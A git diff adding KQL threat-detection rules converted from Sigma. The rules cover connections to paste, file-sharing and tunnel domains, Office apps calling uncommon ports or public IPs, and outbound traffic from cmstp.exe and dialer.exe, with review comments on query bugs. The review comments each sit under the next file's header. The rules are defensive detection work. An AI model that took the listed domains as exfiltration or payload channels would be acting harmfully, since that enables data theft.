+| where (RemoteUrl endswith ".t.me" or RemoteUrl endswith "4shared.com" or RemoteUrl endswith "abuse.ch" or RemoteUrl endswith "anonfiles.com" or RemoteUrl endswith "cdn.discordapp.com" or RemoteUrl endswith "cloudflare.com" or RemoteUrl endswith "ddns.net" or RemoteUrl endswith "discord.com" or RemoteUrl endswith "docs.google.com" or RemoteUrl endswith "drive.google.com" or RemoteUrl endswith "dropbox.com" or RemoteUrl endswith "dropmefiles.com" or RemoteUrl endswith "facebook.com" or RemoteUrl endswith "feeds.rapidfeeds.com" or RemoteUrl endswith "fotolog.com" or RemoteUrl endswith "ghostbin.co/" or RemoteUrl endswith "githubusercontent.com" or RemoteUrl endswith "gofile.io" or RemoteUrl endswith "hastebin.com" or RemoteUrl endswith "imgur.com" or RemoteUrl endswith "livejournal.com" or RemoteUrl endswith "mediafire.com" or RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz" or RemoteUrl endswith "onedrive.com" or RemoteUrl endswith "pages.dev" or RemoteUrl endswith "paste.ee" or RemoteUrl endswith "pastebin.com" or RemoteUrl endswith "pastebin.pl" or RemoteUrl endswith "pastetext.net" or RemoteUrl endswith "pixeldrain.com" or RemoteUrl endswith "privatlab.com" or RemoteUrl endswith "privatlab.net" or RemoteUrl endswith "reddit.com" or RemoteUrl endswith "send.exploit.in" or RemoteUrl endswith "sendspace.com" or RemoteUrl endswith "steamcommunity.com" or RemoteUrl endswith "storage.googleapis.com" or RemoteUrl endswith "technet.microsoft.com" or RemoteUrl endswith "temp.sh" or RemoteUrl endswith "transfer.sh" or RemoteUrl endswith "trycloudflare.com" or RemoteUrl endswith "twitter.com" or RemoteUrl endswith "ufile.io" or RemoteUrl endswith "vimeo.com" or RemoteUrl endswith "w3spaces.com" or RemoteUrl endswith "wetransfer.com" or RemoteUrl endswith "workers.dev" or RemoteUrl endswith "youtube.com") and (not(((InitiatingProcessFolderPath endswith "\\avant.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Avant Browser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Avant Browser\\")) or (InitiatingProcessFolderPath endswith "\\brave.exe" and InitiatingProcessFolderPath startswith "C:\\Program Files\\BraveSoftware\\") or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe", "C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Google\\Chrome\\Application\\chrome.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or ((InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender Advanced Threat Protection\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Windows Defender\\" or InitiatingProcessFolderPath contains "C:\\ProgramData\\Microsoft\\Windows Defender\\Platform\\") and (InitiatingProcessFolderPath endswith "\\MsMpEng.exe" or InitiatingProcessFolderPath endswith "\\MsSense.exe")) or ((RemoteUrl endswith "discord.com" or RemoteUrl endswith "cdn.discordapp.com") and InitiatingProcessFolderPath contains "\\AppData\\Local\\Discord\\" and InitiatingProcessFolderPath endswith "\\Discord.exe") or (RemoteUrl endswith "dropbox.com" and (InitiatingProcessFolderPath endswith "\\Dropbox.exe" or InitiatingProcessFolderPath endswith "\\DropboxInstaller.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Dropbox\\Client\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Dropbox\\Client\\")) or (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\" or InitiatingProcessFolderPath endswith "\\WindowsApps\\MicrosoftEdge.exe" or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe", "C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe"))) or ((InitiatingProcessFolderPath endswith "\\msedge.exe" or InitiatingProcessFolderPath endswith "\\msedgewebview2.exe") and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Microsoft\\EdgeCore\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\Microsoft\\EdgeCore\\")) or InitiatingProcessFolderPath =~ "" or (InitiatingProcessFolderPath endswith "\\falkon.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Falkon\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Falkon\\")) or (InitiatingProcessFolderPath in~ ("C:\\Program Files\\Mozilla Firefox\\firefox.exe", "C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe")) or (InitiatingProcessFolderPath endswith "\\AppData\\Local\\Mozilla Firefox\\firefox.exe" and InitiatingProcessFolderPath startswith "C:\\Users\\") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Flock\\" and InitiatingProcessFolderPath endswith "\\Flock.exe") or (RemoteUrl endswith "drive.google.com" and (InitiatingProcessFolderPath contains "C:\\Program Files\\Google\\Drive File Stream\\" or InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Google\\Drive File Stream\\") and InitiatingProcessFolderPath endswith "GoogleDriveFS.exe") or (InitiatingProcessFolderPath in~ ("C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe", "C:\\Program Files\\Internet Explorer\\iexplore.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Maxthon\\" and InitiatingProcessFolderPath endswith "\\maxthon.exe") or ((RemoteUrl endswith "mega.co.nz" or RemoteUrl endswith "mega.nz") and (InitiatingProcessFolderPath endswith "\\MEGAsync.exe" or (InitiatingProcessFolderPath contains "\\MEGAsyncSetup32_" and InitiatingProcessFolderPath contains "RC.exe") or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup32.exe" or InitiatingProcessFolderPath endswith "\\MEGAsyncSetup64.exe" or InitiatingProcessFolderPath endswith "\\MEGAupdater.exe")) or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\midori-ng\\" and InitiatingProcessFolderPath endswith "\\Midori Next Generation.exe") or isnull(InitiatingProcessFolderPath) or (RemoteUrl endswith "onedrive.com" and InitiatingProcessFolderPath contains "\\AppData\\Local\\Microsoft\\OneDrive\\" and InitiatingProcessFolderPath endswith "\\OneDrive.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Programs\\Opera\\" and InitiatingProcessFolderPath endswith "\\opera.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Phoebe\\" and InitiatingProcessFolderPath endswith "\\Phoebe.exe") or (InitiatingProcessFolderPath endswith "C:\\Program Files (x86)\\PRTG Network Monitor\\PRTG Probe.exe" or InitiatingProcessFolderPath endswith "C:\\Program Files\\PRTG Network Monitor\\PRTG Probe.exe") or (InitiatingProcessFolderPath endswith "\\QtWeb.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\QtWeb\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\QtWeb\\")) or ((InitiatingProcessFolderPath contains "C:\\Program Files (x86)\\Safari\\" or InitiatingProcessFolderPath contains "C:\\Program Files\\Safari\\") and InitiatingProcessFolderPath endswith "\\safari.exe") or (InitiatingProcessFolderPath endswith "\\seamonkey.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SeaMonkey\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SeaMonkey\\")) or (InitiatingProcessFolderPath endswith "\\slimbrowser.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\SlimBrowser\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\SlimBrowser\\")) or (RemoteUrl endswith ".t.me" and InitiatingProcessFolderPath contains "\\AppData\\Roaming\\Telegram Desktop\\" and InitiatingProcessFolderPath endswith "\\Telegram.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\Vivaldi\\" and InitiatingProcessFolderPath endswith "\\vivaldi.exe") or (InitiatingProcessFolderPath endswith "\\whale.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Naver\\Naver Whale\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Naver\\Naver Whale\\")) or (InitiatingProcessFolderPath endswith "\\Waterfox.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files\\Waterfox\\" or InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\Waterfox\\")) or (RemoteUrl endswith "facebook.com" and InitiatingProcessFolderPath endswith "\\WhatsApp.exe" and (InitiatingProcessFolderPath startswith "C:\\Program Files (x86)\\WindowsApps\\" or InitiatingProcessFolderPath startswith "C:\\Program Files\\WindowsApps\\")))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql
new file mode 100644
index 00000000..6bf2b8c2
--- /dev/null
+++ b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_over_uncommon_ports.kql
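Review bot: `RemoteUrl endswith "ghostbin.co/"` in the detection list is a dead term: for the connection events this query reads, RemoteUrl carries the remote FQDN with no path or trailing slash, so no row can end in `/` and ghostbin traffic is silently never matched; it should read `RemoteUrl endswith "ghostbin.co"` (the slash looks inherited from the Sigma source and is worth fixing upstream as well). A softer point: none of the domain terms is anchored with a leading dot, so `RemoteUrl endswith "dropbox.com"` also matches a host like `notdropbox.com`, and `endswith "cloudflare.com"`, `"pages.dev"` and `"workers.dev"` will match a great deal of benign CDN traffic; if the intent is the listed sites, prefer pairs of the form `RemoteUrl =~ "dropbox.com" or RemoteUrl endswith ".dropbox.com"`, or expect to tune this rule heavily before it is useful.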
@@ -0,0 +1,12 @@
+// Title: Office Application Initiated Network Connection Over Uncommon Ports
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-07-12
+// Level: medium
+// Description: Detects an office suit application (Word, Excel, PowerPoint, Outlook) communicating to target systems over uncommon ports.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control
+// False Positives:
+// - Other ports can be used, apply additional filters accordingly
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")) or ((RemotePort in~ ("143", "465", "587", "993", "995")) and InitiatingProcessFolderPath contains ":\\Program Files\\Microsoft Office\\" and InitiatingProcessFolderPath endswith "\\OUTLOOK.EXE"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql
new file mode 100644
index 00000000..be91f7d9
--- /dev/null
+++ b/KQL/rules/windows/network_connection/office_application_initiated_network_connection_to_non_local_ip.kql
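Review bot: `RemotePort in~ ("53", "80", "139", "389", "443", "445", "3268")` and `RemotePort in~ ("143", "465", "587", "993", "995")` compare what Advanced Hunting documents as an integer column against string literals with the case-insensitive string operator; depending on the engine this is either a type error or an implicit conversion that should not be relied on, and either way the port allow-list — the whole point of this rule — may never exclude anything. Write the sets as integers, `RemotePort in (53, 80, 139, 389, 443, 445, 3268)` and `RemotePort in (143, 465, 587, 993, 995)`, which matches the `RemotePort == 443` form the sibling rules in this commit already use. This looks like a converter-level issue (Sigma port values emitted as strings) rather than a one-off, so the fix belongs in the conversion step, not only in this file.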
@@ -0,0 +1,16 @@
+// Title: Office Application Initiated Network Connection To Non-Local IP
+// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2021-11-10
+// Level: medium
+// Description: Detects an office application (Word, Excel, PowerPoint) that initiate a network connection to a non-private IP addresses.
+// This rule aims to detect traffic similar to one seen exploited in CVE-2021-42292.
+// This rule will require an initial baseline and tuning that is specific to your organization.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1203
+// False Positives:
+// - You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.
+// - Office documents commonly have templates that refer to external addresses, like "sharepoint.ourcompany.com" may have to be tuned.
+// - It is highly recommended to baseline your activity and tune out common business use cases.
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\excel.exe" or InitiatingProcessFolderPath endswith "\\outlook.exe" or InitiatingProcessFolderPath endswith "\\powerpnt.exe" or InitiatingProcessFolderPath endswith "\\winword.exe" or InitiatingProcessFolderPath endswith "\\wordview.exe") and (not(((RemoteUrl endswith ".deploy.static.akamaitechnologies.com" and RemotePort == 443 and Protocol =~ "tcp") or (ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7")) or ((ipv4_is_in_range(RemoteIP, "13.107.4.0/22") or ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.42.0/23") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.35.224.0/20") or ipv4_is_in_range(RemoteIP, "23.53.40.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "23.216.76.0/22") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("80", "443"))) or ((ipv4_is_in_range(RemoteIP, "13.107.6.152/31") or ipv4_is_in_range(RemoteIP, "13.107.18.10/31") or ipv4_is_in_range(RemoteIP, "13.107.128.0/22") or ipv4_is_in_range(RemoteIP, "23.103.160.0/20") or ipv4_is_in_range(RemoteIP, "40.96.0.0/13") or ipv4_is_in_range(RemoteIP, "40.104.0.0/15") or ipv4_is_in_range(RemoteIP, "52.96.0.0/14") or ipv4_is_in_range(RemoteIP, "131.253.33.215/32") or ipv4_is_in_range(RemoteIP, "132.245.0.0/16") or ipv4_is_in_range(RemoteIP, "150.171.32.0/22") or ipv4_is_in_range(RemoteIP, "204.79.197.215/32") or ipv4_is_in_range(RemoteIP, "2603:1006::/40") or ipv4_is_in_range(RemoteIP, "2603:1016::/36") or ipv4_is_in_range(RemoteIP, "2603:1026::/36") or ipv4_is_in_range(RemoteIP, "2603:1036::/36") or ipv4_is_in_range(RemoteIP, "2603:1046::/36") or ipv4_is_in_range(RemoteIP, "2603:1056::/36") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::153/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::10/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:d::11/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f0::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:900::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::152/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::153/128")) and (RemotePort in~ ("143", "587", "993", "995")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 443) or ((ipv4_is_in_range(RemoteIP, "40.92.0.0/15") or ipv4_is_in_range(RemoteIP, "40.107.0.0/16") or ipv4_is_in_range(RemoteIP, "52.100.0.0/14") or ipv4_is_in_range(RemoteIP, "52.238.78.88/32") or ipv4_is_in_range(RemoteIP, "104.47.0.0/17") or ipv4_is_in_range(RemoteIP, "2a01:111:f400::/48") or ipv4_is_in_range(RemoteIP, "2a01:111:f403::/48")) and RemotePort == 25) or (ipv4_is_in_range(RemoteIP, "2.16.56.0/23") or ipv4_is_in_range(RemoteIP, "2.17.248.0/21") or ipv4_is_in_range(RemoteIP, "13.107.240.0/21") or ipv4_is_in_range(RemoteIP, "20.184.0.0/13") or ipv4_is_in_range(RemoteIP, "23.61.224.0/20") or ipv4_is_in_range(RemoteIP, "20.192.0.0/10") or ipv4_is_in_range(RemoteIP, "23.72.0.0/13") or ipv4_is_in_range(RemoteIP, "23.3.88.0/22") or ipv4_is_in_range(RemoteIP, "23.216.132.0/22") or ipv4_is_in_range(RemoteIP, "40.76.0.0/14") or ipv4_is_in_range(RemoteIP, "51.10.0.0/15") or ipv4_is_in_range(RemoteIP, "51.103.0.0/16") or ipv4_is_in_range(RemoteIP, "51.104.0.0/15") or ipv4_is_in_range(RemoteIP, "51.142.136.0/22") or ipv4_is_in_range(RemoteIP, "52.160.0.0/11") or ipv4_is_in_range(RemoteIP, "95.101.96.0/21") or ipv4_is_in_range(RemoteIP, "204.79.197.0/24")) or ((ipv4_is_in_range(RemoteIP, "13.107.6.171/32") or ipv4_is_in_range(RemoteIP, "13.107.18.15/32") or ipv4_is_in_range(RemoteIP, "13.107.140.6/32") or ipv4_is_in_range(RemoteIP, "20.64.0.0/10") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.244.37.168/32") or ipv4_is_in_range(RemoteIP, "2603:1006:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1016:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1026:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1036:2400::/40") or ipv4_is_in_range(RemoteIP, "2603:1046:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1056:1400::/40") or ipv4_is_in_range(RemoteIP, "2603:1063:2000::/38") or ipv4_is_in_range(RemoteIP, "2620:1ec:c::15/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:8fc::6/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::171/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2000::a83e:3019/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2d79/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:2002::8975:2da8/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:7000::6fdd:6cd5/128") or ipv4_is_in_range(RemoteIP, "2a01:111:f100:a004::bfeb:88cf/128")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "172.128.0.0/10") or ipv4_is_in_range(RemoteIP, "20.20.32.0/19") or ipv4_is_in_range(RemoteIP, "20.103.156.88/32") or ipv4_is_in_range(RemoteIP, "20.190.128.0/18") or ipv4_is_in_range(RemoteIP, "20.231.128.0/19") or ipv4_is_in_range(RemoteIP, "40.126.0.0/18") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "2603:1006:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1007:200::/48") or ipv4_is_in_range(RemoteIP, "2603:1016:1400::/48") or ipv4_is_in_range(RemoteIP, "2603:1017::/48") or ipv4_is_in_range(RemoteIP, "2603:1026:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1027:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1036:3000::/48") or ipv4_is_in_range(RemoteIP, "2603:1037:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1046:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1047:1::/48") or ipv4_is_in_range(RemoteIP, "2603:1056:2000::/48") or ipv4_is_in_range(RemoteIP, "2603:1057:2::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.64.0.0/11") or ipv4_is_in_range(RemoteIP, "13.107.6.192/32") or ipv4_is_in_range(RemoteIP, "13.107.9.192/32") or ipv4_is_in_range(RemoteIP, "13.89.179.14/32") or ipv4_is_in_range(RemoteIP, "20.40.0.0/14") or ipv4_is_in_range(RemoteIP, "20.48.0.0/12") or ipv4_is_in_range(RemoteIP, "20.64.0.0/12") or ipv4_is_in_range(RemoteIP, "52.123.0.0/16") or ipv4_is_in_range(RemoteIP, "52.108.0.0/14") or ipv4_is_in_range(RemoteIP, "52.136.0.0/13") or ipv4_is_in_range(RemoteIP, "57.150.0.0/15") or ipv4_is_in_range(RemoteIP, "80.239.150.67/32") or ipv4_is_in_range(RemoteIP, "2620:1ec:4::192/128") or ipv4_is_in_range(RemoteIP, "2620:1ec:a92::192/128")) and RemotePort == 443 and Protocol =~ "tcp") or ((ipv4_is_in_range(RemoteIP, "13.107.136.0/22") or ipv4_is_in_range(RemoteIP, "40.108.128.0/17") or ipv4_is_in_range(RemoteIP, "52.104.0.0/14") or ipv4_is_in_range(RemoteIP, "104.146.128.0/17") or ipv4_is_in_range(RemoteIP, "150.171.40.0/22") or ipv4_is_in_range(RemoteIP, "2603:1061:1300::/40") or ipv4_is_in_range(RemoteIP, "2620:1ec:8f8::/46") or ipv4_is_in_range(RemoteIP, "2620:1ec:908::/46") or ipv4_is_in_range(RemoteIP, "2a01:111:f402::/48")) and (RemotePort in~ ("80", "443")) and Protocol =~ "tcp"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql
new file mode 100644
index 00000000..420bbeae
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_cmstp_exe.kql
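Review bot: Every IPv6 prefix in the exclusion block (`"::1/128"`, `"fe80::/10"`, `"fc00::/7"`, the `2603:…`, `2620:1ec:…` and `2a01:111:…` entries) is passed to `ipv4_is_in_range`, which returns null whenever an argument does not parse as IPv4; in Kusto `false or null` is null, `not(null)` is null, and `where` drops rows whose predicate is null. For a public IPv4 destination none of the IPv4 ranges matches, so each group collapses to null instead of false, the outer `not(...)` is null and the row is discarded — as far as I can trace it this rule returns no rows at all, the opposite of its intent, and IPv6 destinations are dropped the same way. Evaluate the IPv6 prefixes with `ipv6_is_in_range(RemoteIP, ...)` and wrap each `or` group in `coalesce(..., false)` so a non-matching family yields a definite false; a leading `| where RemoteIPType == "Public"` is a simpler table-native first stage if the loopback/private/link-local groups are all that matters. The same line also compares the integer `RemotePort` with string sets (`RemotePort in~ ("80", "443")`, `in~ ("143", "587", "993", "995")`) next to `RemotePort == 443`; write those as `RemotePort in (80, 443)` and `RemotePort in (143, 587, 993, 995)`.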
@@ -0,0 +1,11 @@
+// Title: Outbound Network Connection Initiated By Cmstp.EXE
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2022-08-30
+// Level: high
+// Description: Detects a network connection initiated by Cmstp.EXE
+// Its uncommon for "cmstp.exe" to initiate an outbound network connection. Investigate the source of such requests to determine if they are malicious.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.003
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith "\\cmstp.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql
new file mode 100644
index 00000000..3c5c13f6
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_microsoft_dialer.kql
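Review bot: The `not((ipv4_is_in_range(...) or ...))` exclusion hands the IPv6 prefixes `"::1/128"`, `"fe80::/10"` and `"fc00::/7"` to `ipv4_is_in_range`, which returns null when an argument is not IPv4; because `false or null` is null, `not(null)` is null and `where` discards null rows, a cmstp.exe connection to a public IPv4 address — the case this rule exists to catch — evaluates to null and is dropped, and IPv6 destinations are dropped for the same reason. Only RFC1918/loopback/link-local IPv4 rows get a definite value (true), which the filter also removes, so the rule as written should never return a row. Split the ranges by address family, check the IPv6 prefixes with `ipv6_is_in_range`, and coalesce each group to false as below; `RemoteIPType == "Public"` is the table-native shortcut if loopback/private/reserved is the only distinction needed (confirm the exact type values in your tenant).
```kql
DeviceNetworkEvents
| where InitiatingProcessFolderPath endswith "\\cmstp.exe"
// ipv4_is_in_range() yields null for an IPv6 address or an IPv6 prefix, null survives
// `or`/`not`, and `where` drops null rows -- so check each family with its own function
// and coalesce each group to false when nothing in it matches.
| extend IsLocalV4 = coalesce(ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16"), false)
| extend IsLocalV6 = coalesce(ipv6_is_in_range(RemoteIP, "::1/128") or ipv6_is_in_range(RemoteIP, "fe80::/10") or ipv6_is_in_range(RemoteIP, "fc00::/7"), false)
| where not(IsLocalV4 or IsLocalV6)
```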
@@ -0,0 +1,14 @@
+// Title: Outbound Network Connection Initiated By Microsoft Dialer
+// Author: CertainlyP
+// Date: 2024-04-26
+// Level: high
+// Description: Detects outbound network connection initiated by Microsoft Dialer.
+// The Microsoft Dialer, also known as Phone Dialer, is a built-in utility application included in various versions of the Microsoft Windows operating system. Its primary function is to provide users with a graphical interface for managing phone calls via a modem or a phone line connected to the computer.
+// This is an outdated process in the current conext of it's usage and is a common target for info stealers for process injection, and is used to make C2 connections, common example is "Rhadamanthys"
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.command-and-control, attack.t1071.001
+// False Positives:
+// - In Modern Windows systems, unable to see legitimate usage of this process, However, if an organization has legitimate purpose for this there can be false positives.
+
+DeviceNetworkEvents
+| where InitiatingProcessFolderPath endswith ":\\Windows\\System32\\dialer.exe" and (not((ipv4_is_in_range(RemoteIP, "127.0.0.0/8") or ipv4_is_in_range(RemoteIP, "10.0.0.0/8") or ipv4_is_in_range(RemoteIP, "172.16.0.0/12") or ipv4_is_in_range(RemoteIP, "192.168.0.0/16") or ipv4_is_in_range(RemoteIP, "169.254.0.0/16") or ipv4_is_in_range(RemoteIP, "::1/128") or ipv4_is_in_range(RemoteIP, "fe80::/10") or ipv4_is_in_range(RemoteIP, "fc00::/7"))))
\ No newline at end of file
diff --git a/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql
new file mode 100644
index 00000000..377a8332
--- /dev/null
+++ b/KQL/rules/windows/network_connection/outbound_network_connection_initiated_by_script_interpreter.kql
